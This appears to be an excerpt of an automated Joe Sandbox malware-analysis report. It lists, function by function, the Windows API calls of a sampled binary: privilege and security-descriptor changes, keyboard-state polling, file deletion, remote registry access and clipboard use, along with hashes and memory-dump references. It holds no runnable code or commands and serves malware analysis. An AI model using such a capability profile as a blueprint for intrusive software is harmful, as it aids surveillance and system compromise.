                                                              • CloseHandle.KERNEL32(?), ref: 004883B6
                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004883CD
                                                              • GetProcessWindowStation.USER32 ref: 004883E6
                                                              • SetProcessWindowStation.USER32(00000000), ref: 004883F0
                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0048840A
                                                                • Part of subcall function 004881CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00488309), ref: 004881E0
                                                                • Part of subcall function 004881CB: CloseHandle.KERNEL32(?,?,00488309), ref: 004881F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                              • String ID: $default$winsta0
                                                              • API String ID: 2063423040-1027155976
                                                              • Opcode ID: 2cc35d8eba0a73c32d934f177d5d090f79b97913643d9fec4a0ecac14068b532
                                                              • Instruction ID: d667821ef7a34ae685710729c38aed9cd40bfc1ddd7713faa3c2310b7b3558b9
                                                              • Opcode Fuzzy Hash: 2cc35d8eba0a73c32d934f177d5d090f79b97913643d9fec4a0ecac14068b532
                                                              • Instruction Fuzzy Hash: 7E816AB1900209BFDF11AFA5CC45AEE7BB9FF04304F54456EF814A2261DB399E19DB28
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0049C78D
                                                              • FindClose.KERNEL32(00000000), ref: 0049C7E1
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0049C806
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0049C81D
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0049C844
                                                              • __swprintf.LIBCMT ref: 0049C890
                                                              • __swprintf.LIBCMT ref: 0049C8D3
                                                                • Part of subcall function 00437DE1: _memmove.LIBCMT ref: 00437E22
                                                              • __swprintf.LIBCMT ref: 0049C927
                                                                • Part of subcall function 00453698: __woutput_l.LIBCMT ref: 004536F1
                                                              • __swprintf.LIBCMT ref: 0049C975
                                                                • Part of subcall function 00453698: __flsbuf.LIBCMT ref: 00453713
                                                                • Part of subcall function 00453698: __flsbuf.LIBCMT ref: 0045372B
                                                              • __swprintf.LIBCMT ref: 0049C9C4
                                                              • __swprintf.LIBCMT ref: 0049CA13
                                                              • __swprintf.LIBCMT ref: 0049CA62
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                              • API String ID: 3953360268-2428617273
                                                              • Opcode ID: 8e008a979c3e6bf15dde95e2eeeaf0ebb25cfc282e68172a53be6ddce007e079
                                                              • Instruction ID: 865e95455f15134758b43d2f331b387749ddb661521e3477afe2cb99ca9798ae
                                                              • Opcode Fuzzy Hash: 8e008a979c3e6bf15dde95e2eeeaf0ebb25cfc282e68172a53be6ddce007e079
                                                              • Instruction Fuzzy Hash: 59A140B1408344ABD714EF95C885DAFB7ECFF88709F40192EF585C6151EA78DA08CB66
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0049EFB6
                                                              • _wcscmp.LIBCMT ref: 0049EFCB
                                                              • _wcscmp.LIBCMT ref: 0049EFE2
                                                              • GetFileAttributesW.KERNEL32(?), ref: 0049EFF4
                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 0049F00E
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0049F026
                                                              • FindClose.KERNEL32(00000000), ref: 0049F031
                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 0049F04D
                                                              • _wcscmp.LIBCMT ref: 0049F074
                                                              • _wcscmp.LIBCMT ref: 0049F08B
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0049F09D
                                                              • SetCurrentDirectoryW.KERNEL32(004E8920), ref: 0049F0BB
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0049F0C5
                                                              • FindClose.KERNEL32(00000000), ref: 0049F0D2
                                                              • FindClose.KERNEL32(00000000), ref: 0049F0E4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                              • String ID: *.*
                                                              • API String ID: 1803514871-438819550
                                                              • Opcode ID: 66e7f0b8d03d9ceecbf75e4169a862901d6d7e1fdf9c709e4204e98b26e4afe0
                                                              • Instruction ID: 000033135e91a07f656ebc176bb70a4b16c55612824b9d587c55e47dd7f40b42
                                                              • Opcode Fuzzy Hash: 66e7f0b8d03d9ceecbf75e4169a862901d6d7e1fdf9c709e4204e98b26e4afe0
                                                              • Instruction Fuzzy Hash: 2B31B6325012187BDF14DFB5DC49AEE7BAC9F44361F1401B7E808D2191DB79DA48CA6D
                                                              APIs
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004B0953
                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,004BF910,00000000,?,00000000,?,?), ref: 004B09C1
                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 004B0A09
                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 004B0A92
                                                              • RegCloseKey.ADVAPI32(?), ref: 004B0DB2
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004B0DBF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Close$ConnectCreateRegistryValue
                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                              • API String ID: 536824911-966354055
                                                              • Opcode ID: 061a417e759cabeade4d341e3af5eb3b674444f31eed9c9eff5cb81efb7b7233
                                                              • Instruction ID: 294098fa75da494182498f75a475a935017da30b0f8e8817888c274ec14a38da
                                                              • Opcode Fuzzy Hash: 061a417e759cabeade4d341e3af5eb3b674444f31eed9c9eff5cb81efb7b7233
                                                              • Instruction Fuzzy Hash: 19023A756006019FCB14EF19C881E6AB7E5FF89314F04855EF8899B3A2CB78ED05CB99
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0DM$0EM$0FM$3cD$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGM$_D
                                                              • API String ID: 0-1571114681
                                                              • Opcode ID: b3a137d33b79b2f9c52dfd541658b17ee0742e395a9b83b5f44c38fb91b66979
                                                              • Instruction ID: e5edff143c0eb95a7776ef4250570b911324b8d83c14ad8edf35259aa86a0faf
                                                              • Opcode Fuzzy Hash: b3a137d33b79b2f9c52dfd541658b17ee0742e395a9b83b5f44c38fb91b66979
                                                              • Instruction Fuzzy Hash: 1E726E71E002199BEB14DF59C8807AEB7B5FF45310F15856BE805EB390EB389D82CB99
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0049F113
                                                              • _wcscmp.LIBCMT ref: 0049F128
                                                              • _wcscmp.LIBCMT ref: 0049F13F
                                                                • Part of subcall function 00494385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004943A0
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0049F16E
                                                              • FindClose.KERNEL32(00000000), ref: 0049F179
                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 0049F195
                                                              • _wcscmp.LIBCMT ref: 0049F1BC
                                                              • _wcscmp.LIBCMT ref: 0049F1D3
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0049F1E5
                                                              • SetCurrentDirectoryW.KERNEL32(004E8920), ref: 0049F203
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0049F20D
                                                              • FindClose.KERNEL32(00000000), ref: 0049F21A
                                                              • FindClose.KERNEL32(00000000), ref: 0049F22C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                              • String ID: *.*
                                                              • API String ID: 1824444939-438819550
                                                              • Opcode ID: d9249ecfc69c45f0c05a9f2a60316c27c00115dc9fd2b0bc45c0acc215c84476
                                                              • Instruction ID: ba9c007c816659bfc46bcd19759bc65eee93c6139fb43a74b270a1515cd245ef
                                                              • Opcode Fuzzy Hash: d9249ecfc69c45f0c05a9f2a60316c27c00115dc9fd2b0bc45c0acc215c84476
                                                              • Instruction Fuzzy Hash: 5C31B3365002196ACF149FA4EC49FEF7BAC9F45365F1402B7E804E2191DB39DE49CA6C
                                                              APIs
                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0049A20F
                                                              • __swprintf.LIBCMT ref: 0049A231
                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 0049A26E
                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0049A293
                                                              • _memset.LIBCMT ref: 0049A2B2
                                                              • _wcsncpy.LIBCMT ref: 0049A2EE
                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0049A323
                                                              • CloseHandle.KERNEL32(00000000), ref: 0049A32E
                                                              • RemoveDirectoryW.KERNEL32(?), ref: 0049A337
                                                              • CloseHandle.KERNEL32(00000000), ref: 0049A341
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                              • String ID: :$\$\??\%s
                                                              • API String ID: 2733774712-3457252023
                                                              • Opcode ID: 6016f68e01b5cee441d9c412756b2cbdbe2587a46b5c2551fa48f23c9d954178
                                                              • Instruction ID: 5549b965648e90950d339df0cdb5aba3fd9795ceca1536459429353174174be9
                                                              • Opcode Fuzzy Hash: 6016f68e01b5cee441d9c412756b2cbdbe2587a46b5c2551fa48f23c9d954178
                                                              • Instruction Fuzzy Hash: CA31D371500109ABDF209FA0DC49FEB37BCEF88705F1041B7F908D2160EB7496588B69
                                                              APIs
                                                                • Part of subcall function 00488202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0048821E
                                                                • Part of subcall function 00488202: GetLastError.KERNEL32(?,00487CE2,?,?,?), ref: 00488228
                                                                • Part of subcall function 00488202: GetProcessHeap.KERNEL32(00000008,?,?,00487CE2,?,?,?), ref: 00488237
                                                                • Part of subcall function 00488202: HeapAlloc.KERNEL32(00000000,?,00487CE2,?,?,?), ref: 0048823E
                                                                • Part of subcall function 00488202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00488255
                                                                • Part of subcall function 0048829F: GetProcessHeap.KERNEL32(00000008,00487CF8,00000000,00000000,?,00487CF8,?), ref: 004882AB
                                                                • Part of subcall function 0048829F: HeapAlloc.KERNEL32(00000000,?,00487CF8,?), ref: 004882B2
                                                                • Part of subcall function 0048829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00487CF8,?), ref: 004882C3
                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00487D13
                                                              • _memset.LIBCMT ref: 00487D28
                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00487D47
                                                              • GetLengthSid.ADVAPI32(?), ref: 00487D58
                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00487D95
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00487DB1
                                                              • GetLengthSid.ADVAPI32(?), ref: 00487DCE
                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00487DDD
                                                              • HeapAlloc.KERNEL32(00000000), ref: 00487DE4
                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00487E05
                                                              • CopySid.ADVAPI32(00000000), ref: 00487E0C
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00487E3D
                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00487E63
                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00487E77
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                              • String ID:
                                                              • API String ID: 3996160137-0
                                                              • Opcode ID: 0502a81dffc18e98c0adeabee1379fad7a9809ef054bee0983258d92ec854b99
                                                              • Instruction ID: 56a82255ce6d1d872a70e94513c66d0a001791bc23a54d251012886be3e30311
                                                              • Opcode Fuzzy Hash: 0502a81dffc18e98c0adeabee1379fad7a9809ef054bee0983258d92ec854b99
                                                              • Instruction Fuzzy Hash: F3616D71904109AFCF00EFA5DC54AEEBB79FF08304F14866AE819A6291DB39DE05DB64
                                                              APIs
                                                              • GetKeyboardState.USER32(?), ref: 00490097
                                                              • SetKeyboardState.USER32(?), ref: 00490102
                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00490122
                                                              • GetKeyState.USER32(000000A0), ref: 00490139
                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00490168
                                                              • GetKeyState.USER32(000000A1), ref: 00490179
                                                              • GetAsyncKeyState.USER32(00000011), ref: 004901A5
                                                              • GetKeyState.USER32(00000011), ref: 004901B3
                                                              • GetAsyncKeyState.USER32(00000012), ref: 004901DC
                                                              • GetKeyState.USER32(00000012), ref: 004901EA
                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00490213
                                                              • GetKeyState.USER32(0000005B), ref: 00490221
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: State$Async$Keyboard
                                                              • String ID:
                                                              • API String ID: 541375521-0
                                                              • Opcode ID: cde87b604a4dd2e5e85d404541b9ddf5617a88b2f0e77a08a388dbcf99159fb4
                                                              • Instruction ID: f5e10f8d964fcf16dc805f551ea1e9fedecf348f7e314918ffce1e5ea29b8883
                                                              • Opcode Fuzzy Hash: cde87b604a4dd2e5e85d404541b9ddf5617a88b2f0e77a08a388dbcf99159fb4
                                                              • Instruction Fuzzy Hash: E451DB209047882DFF35DBA098557ABBFB49F01380F0845BF99C5562C3DA6C9B8CC769
                                                              APIs
                                                                • Part of subcall function 004B0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004AFDAD,?,?), ref: 004B0E31
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004B04AC
                                                                • Part of subcall function 00439837: __itow.LIBCMT ref: 00439862
                                                                • Part of subcall function 00439837: __swprintf.LIBCMT ref: 004398AC
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 004B054B
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004B05E3
                                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 004B0822
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004B082F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                              • String ID:
                                                              • API String ID: 1240663315-0
                                                              • Opcode ID: 6b15dfe68101992733c19245efe1c5cb2453752f8f83510bb3aad2bd2b3f2630
                                                              • Instruction ID: e9ed6caee20d3461d73c1e2029923fcbe79807e1c9cf5e88925a033de703b3e6
                                                              • Opcode Fuzzy Hash: 6b15dfe68101992733c19245efe1c5cb2453752f8f83510bb3aad2bd2b3f2630
                                                              • Instruction Fuzzy Hash: 03E15071604200AFCB14EF69C891D6BBBE4FF89314F04856EF84AD7261DA34ED05CB95
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                              • String ID:
                                                              • API String ID: 1737998785-0
                                                              • Opcode ID: e9abb02fe7443fe329f85096add3914f233c7ba36f4e2cd6aad2428a89efe679
                                                              • Instruction ID: e1cff0963d6d4053f2deed1d8f113d55fb679fe32f9a1af3060dee3ac7e4137e
                                                              • Opcode Fuzzy Hash: e9abb02fe7443fe329f85096add3914f233c7ba36f4e2cd6aad2428a89efe679
                                                              • Instruction Fuzzy Hash: 4B21B1352002109FDB04AF24EC09B6E7BA8EF95351F00816BF949DB2A1DBB8AC05CB5D
                                                              APIs
                                                                • Part of subcall function 00434750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00434743,?,?,004337AE,?), ref: 00434770
                                                                • Part of subcall function 00494A31: GetFileAttributesW.KERNEL32(?,0049370B), ref: 00494A32
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 004938A3
                                                              • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0049394B
                                                              • MoveFileW.KERNEL32(?,?), ref: 0049395E
                                                              • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0049397B
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0049399D
                                                              • FindClose.KERNEL32(00000000,?,?,?,?), ref: 004939B9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                              • String ID: \*.*
                                                              • API String ID: 4002782344-1173974218
                                                              • Opcode ID: d647dd287c046929ae3c25e935f2d9355ff1a4938a8c48ab99658eea5ec9c262
                                                              • Instruction ID: 121ae9363c0d416af3ad57c2f6113fe48baf4d147289b70f0a05eebffe9199ea
                                                              • Opcode Fuzzy Hash: d647dd287c046929ae3c25e935f2d9355ff1a4938a8c48ab99658eea5ec9c262
                                                              • Instruction Fuzzy Hash: C951B2B180014C9ACF15EFA1C9929FEBB78AF15315F6001BEE44677191EB396F09CB68
                                                              APIs
                                                                • Part of subcall function 00437DE1: _memmove.LIBCMT ref: 00437E22
                                                              • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0049F440
                                                              • Sleep.KERNEL32(0000000A), ref: 0049F470
                                                              • _wcscmp.LIBCMT ref: 0049F484
                                                              • _wcscmp.LIBCMT ref: 0049F49F
                                                              • FindNextFileW.KERNEL32(?,?), ref: 0049F53D
                                                              • FindClose.KERNEL32(00000000), ref: 0049F553
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                              • String ID: *.*
                                                              • API String ID: 713712311-438819550
                                                              • Opcode ID: 22583bdf8c58cafa443640074d61deeb6e8413646a2a7aa3cf40e2858c58e463
                                                              • Instruction ID: c95a9b0225f00efbc07427010ac1d89e9f94a24d1ad8da4bdc78c68bd636d153
                                                              • Opcode Fuzzy Hash: 22583bdf8c58cafa443640074d61deeb6e8413646a2a7aa3cf40e2858c58e463
                                                              • Instruction Fuzzy Hash: 6641607190021AABCF14DF64CC45AEEBBB4FF04324F14457BE819A3291DB389A49CF58
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
